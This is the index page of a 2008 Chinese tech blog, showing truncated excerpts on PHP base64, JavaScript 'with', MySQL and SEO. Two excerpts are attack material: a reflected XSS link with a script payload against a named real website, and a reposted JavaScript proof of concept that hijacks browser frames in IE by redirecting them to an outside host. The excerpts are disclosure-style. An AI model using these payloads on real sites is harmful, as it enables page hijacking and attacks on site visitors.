自由飞翔的xss

文章列表

2008-11-17 01:02

前段时间，刚刚看完《鬼吹灯》，本想自己写点感想，但是由于时间问题，就转了篇比较全的文章，和大家分享一下。

远古的文明，失落的宝藏，神秘莫测的古墓，没有什么比这些元素更能吸引读者的眼球了。
　　
喜欢读书的人恐怕没有人不知道《鬼吹灯》。在2006年差不多一年的时间里，这部分为四册的“盗墓”小说，不但在网络中稳坐冠军宝座，在书市上也名列畅销榜榜首位置。 “天下霸唱”——一个闻所未闻的名字，像雨后春笋般地冒了出来，这个有点拗口的笔名，先是在网

阅读全文>>

类别：读书有感 | 评论(0) | 浏览()

php base64加密解密

2008-11-14 15:28

在PHP中我们可以直接使用PHP自带的函数 base64_encode() 和 base64_decode() 进行加密和解密，废话不说了，我们直接进入正题：

例子 1. base64_encode() 示例

<?php
$str = 'This is an encoded string';
echo base64_encode($str);
?>

此示例将显示：

VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==

例子 2. base64_decode() 示例

<?php
$str = 'VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==';
echo bas

阅读全文>>

类别：服务器脚本 | 评论(0) | 浏览()

js中with的用法

2008-11-13 16:21

with 语句为一个或一组语句指定默认对象，就是选择了函数或变量的作用域。

用法：with (<对象>) <语句>;

with 语句通常用来缩短特定情形下必须写的代码量。

看一个例子就清楚了，请注意 Math 的重复使用：

x = Math.cos(3 * Math.PI) + Math.sin(Math.LN10);
y = Math.tan(14 * Math.E);

当使用 with 语句时，代码变得更短且更易读：

with (Math) {
x = cos(3 * PI) + sin(LN10);
y = tan(14 * E);
}

类别：Javascript | 评论(0) | 浏览()

Mysql数据库的构建的简单流程设计->创建->授权

2008-11-13 02:06

主要是分三步：

设计数据库--------->创建数据库--------->授权用户

下面以一个简单的用户登陆的需求，设计一个简单的Mysql数据库

1.设计数据库

数据库名字取为 test

数据库中包含用户名（username）、密码（password）、电子邮箱（email）

username最多允许16个字节的字符串，主键，用户不可以重名

password最多为16位的字符串

阅读全文>>

类别：心得体会 | 评论(0) | 浏览()

mysql和mysqli的区别与使用[转]

2008-11-10 16:28

mysql是非持继连接函数，而mysqli是永远连接函数。也就是说mysql每次链接都会打开一个连接的进程而mysqli多次运行mysqli将使用同一连接进程,从而减少了服务器的开销。

有些朋友在编程的时候，使用new mysqli('localhost', usenamer', 'password', 'databasename');总是报错，Fatal error: Class 'mysqli' not found in d:\...
mysqli类不是php自带的吗？
不是默认开启的，win下要改php.ini,去掉php_mysqli.dll前的;,linux下要把mysqli编译进去

链接：

阅读全文>>

类别：心得体会 | 评论(0) | 浏览()

MySQL BLOB笔记

2008-11-10 15:50

BLOB (binary large object)，二进制大对象，是一个可以存储二进制文件的容器。

MySQL中，BLOB是个类型系列，包括：TinyBlob、Blob、MediumBlob、LongBlob，这几个类型之间的唯一区别是在存储文件的最大大小上不同。

MySQL的四种BLOB类型

类型                大小(单位：字节)
TinyBlob          最大 255
Blob

阅读全文>>

类别：心得体会 | 评论(0) | 浏览()

魅力“人本计算”

2008-11-09 23:19

利用这一技术，129年的《纽约时报》可以在不到两年内实现数字化。互联网上有些事人可以做好，而计算机却做不好，如何把人的这些资源利用起来，就是“人本计算”的研究内容

　　美国卡内基·梅隆大学28岁的计算机科学家路易斯·梵阿纳（Luis Von Ahn）最近摘得“麦克阿瑟天才奖”，并获得了50万美元奖金。尽管这个奖项并非如诺贝尔奖般具有盛名，但业内对于梵阿纳和他的发明早已耳熟能详。实际上，我们每个人也都在享受其发明带来的成果。
　　我们在登陆电子邮箱以及在网上银行

阅读全文>>

类别：乱七八糟 | 评论(0) | 浏览()

搜索引擎 google baidu 的Sandbox-沙盒效应

2008-11-02 11:25

新站在刚上线的几个月内在Google很难有好的排名，甚至没有排名。这个现象我们称为：Sandbox-沙盒效应。

一个新的网站，即使已经做了很好的SEO优化：丰富的相关内容，大量的高质量外部链接，网站URL搜索引擎友好，网站结构用户体验友好等。但在刚上线的几个月内，在Google几乎找不到好的排名。

Google的Sandbox-沙盒效应一般会持续6个月，这6个月内新站应该不断完善各方面SEO，沙盒效应过后，一般会有不错的排名。

百度对新站也有一个“建立信任期”，一般是2

阅读全文>>

类别：Seo | 评论(0) | 浏览()

网站XSS大箩筐

2008-10-24 15:54

ESET NOD32香港官方网站存在XSS

时间：2008年10月24日

利用链接：
http://www.eset.hk/default.php?id=181&p=24&searchword=%22%3Cscript%3Ealert%281%29%3C/script%3E

阅读全文>>

类别：Xss | 评论(0) | 浏览()

Ghosts for IE8 and IE7.5730[转]

2008-10-21 14:47

Here's a new version of the last post code for hijacking IE6 and IE7 iframes.

Aparently some versions of IE where fixed, (the code didnt worked for 40% of the people), so after downloading the newest IE7, I kept researching and found another issue.

Sample PoC Here.

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listen

阅读全文>>

类别：Xss | 评论(0) | 浏览()